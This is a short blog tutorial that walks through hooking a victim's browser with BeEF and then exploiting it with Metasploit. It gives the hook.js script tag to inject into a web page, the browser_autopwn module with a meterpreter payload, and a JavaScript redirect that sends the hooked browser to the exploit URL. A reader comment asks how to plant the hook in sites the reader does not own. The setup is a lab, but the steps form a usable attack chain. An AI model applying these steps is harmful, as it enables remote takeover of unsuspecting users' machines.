In last tutorial we practice using metasploit for exploiting the target and modify the webpage in target OS while inject it with beef code. Now, we will using web page injected with beef code. Then, we activate metasploit framework using meterpreter payload and keep it in listening process. So, when the target access our web page, we can exploit it using meterpreter.
Now, let's practice it.
First, try to make webpage included with beef code. To do that we just need to add this code '<script type="text/javascript" src="http://192.168.56.1:3000/hook.js"> </script>' after <body> code.
Now, open beef, and access http://127.0.1.1:3000/ui/panel in our browser, login with username and password : beef.
Then, assume target access our web.
Let's see in the beef UI panel, there IP address 192.168.56.101 with Mozilla Firefox icon. It means that our target is accessing our web using Mozilla Frefox browser.
Now, open Metasploit Framework then use auxiliary/server/browser_autopwn and set LHOST and PAYLOAD.
We can see that there are listening process. When http://192.168.56.1:8080/q5Ou9BjYrH is opened, we can exploit the target.
So, we will redirect the target into that address by using Raw Java Script in The Command Tab - Misc, then write javascript code for redirect process "window.location = 'http://192.168.56.1:8080/q5Ou9BjYrH'"
We can see that we have done it...
1 komentar:
Great, but better show us how to embed beef hook inside a web site if we are not the owner.
Post a Comment